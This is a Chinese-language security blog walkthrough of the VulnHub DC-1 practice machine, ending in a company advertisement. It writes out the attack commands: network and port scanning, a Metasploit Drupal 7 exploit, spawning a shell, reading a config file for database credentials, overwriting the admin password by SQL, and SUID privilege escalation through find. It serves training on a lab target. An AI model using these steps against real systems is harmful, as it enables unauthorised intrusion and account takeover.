红队打靶 | vulnhub系列:DC-1

admin 2023年6月14日16:29:13评论55 views字数 1757阅读5分51秒阅读模式

点击蓝字 关注我们

红队打靶 | vulnhub系列:DC-1

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

添加星标不迷路

由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦

红队打靶 | vulnhub系列:DC-1


DC-1打靶记录

环境下载

https://www.vulnhub.com/entry/dc-1,292/

ip配置

NAT模式 跟kali在一个网段
红队打靶 | vulnhub系列:DC-1

一.信息收集

1.扫描同一网段的主机:

arp-scan -l

红队打靶 | vulnhub系列:DC-1

定位ip地址 192.168.117.140

或者使用:

namp 192.168.117.0/24 -sn

红队打靶 | vulnhub系列:DC-1

2.进行端口扫描

namp -sS -A -T4 192.168.117.140 -p 0-65535

发现了许多可利用的信息

红队打靶 | vulnhub系列:DC-1

1. 22端口 后期可以使用hydra进行ssh爆破来获取shell
2. web服务泄露的文件robots.txt反爬虫文件 从中获取版本信息或者敏感信息
3. Drupal 7 cms和版本号

3.web指纹识别

如果在我们不知到如何去突破的时候 可以用:

whatweb -v 192.168.117.140

查看web框架和指纹

红队打靶 | vulnhub系列:DC-1

扫出cms版本和php版本

这里推荐一个小插件 可以快速的识别网站的框架
红队打靶 | vulnhub系列:DC-1

二:漏洞利用

有cms框架的话使用msf来查看漏洞

1.进去msf
msfconsole
2.按照版本查询漏洞
search Drupal 7.x

红队打靶 | vulnhub系列:DC-1

3.发现可利用
‘use 0’ 进入
options 查看信息

红队打靶 | vulnhub系列:DC-1

set RHOSTS=192.168.117.140 设置目标端口
run 发现获取到session的连接

红队打靶 | vulnhub系列:DC-1

查看基本信息
sysinfo 直接建立shell连接
shell

红队打靶 | vulnhub系列:DC-1

这里可以使用python的pty模块来反弹shell
python -c "import pty;pty.spawn('/bin/sh')";

红队打靶 | vulnhub系列:DC-1

flag1

直接 ls 拿到flag
红队打靶 | vulnhub系列:DC-1

手动翻译:

每个好的CMS都需要一个配置文件——你也是。

flag2

直接找配置文件:
一个一个找太慢了吧!
find . -name "set*"
find . -name "*.conf"
找到了!!!!!!

红队打靶 | vulnhub系列:DC-1

好家伙 有flag 还有数据库密码
这不登进去看???

进去就一顿找user表 admin!!!

红队打靶 | vulnhub系列:DC-1

好家伙 加密了 翻翻看 加密脚本吧 给他改了!!!
find . -name "*.sh"
这不有了

红队打靶 | vulnhub系列:DC-1

重新加个密
红队打靶 | vulnhub系列:DC-1

改密码:
update users set pass="" where name='admin'
红队打靶 | vulnhub系列:DC-1

flag3

登录

红队打靶 | vulnhub系列:DC-1

先看看有哪些用户
cat /etc/passwd

红队打靶 | vulnhub系列:DC-1

flag4

cd /home/flag4

红队打靶 | vulnhub系列:DC-1

没权????

三.提权

尝试suid 提权
找到有s权限的文件find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type=f 2>/dev/null

红队打靶 | vulnhub系列:DC-1

find可用!!

find /var/www/misc -exec “/bin/sh” ; find 提权

得到后面两个flag

红队打靶 | vulnhub系列:DC-1

红队打靶 | vulnhub系列:DC-1



欢迎关注SecHub网络安全社区,SecHub网络安全社区目前邀请式注册,邀请码获取见公众号菜单【邀请码】

#


企业简介   


赛克艾威 - 专注政企安全服务


       北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,具有中国网络安全审查技术与认证中心安全风险评估服务三级资质CCRC,信息安全保障人员资质CISAW(安全评估专家级)。


安全评估|渗透测试|漏洞扫描|安全巡检

代码审计|钓鱼演练|应急响应|安全运维

重大时刻安保|企业安全培训

红队打靶 | vulnhub系列:DC-1

联系方式

电话|010-86460828 

官网|https://sechub.com.cn

红队打靶 | vulnhub系列:DC-1

关注我们

红队打靶 | vulnhub系列:DC-1
红队打靶 | vulnhub系列:DC-1
红队打靶 | vulnhub系列:DC-1

公众号:sechub安全

哔哩号:SecHub官方账号


原文始发于微信公众号(sechub安全):红队打靶 | vulnhub系列:DC-1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月14日16:29:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队打靶 | vulnhub系列:DC-1http://cn-sec.com/archives/1806029.html

发表评论

匿名网友 填写信息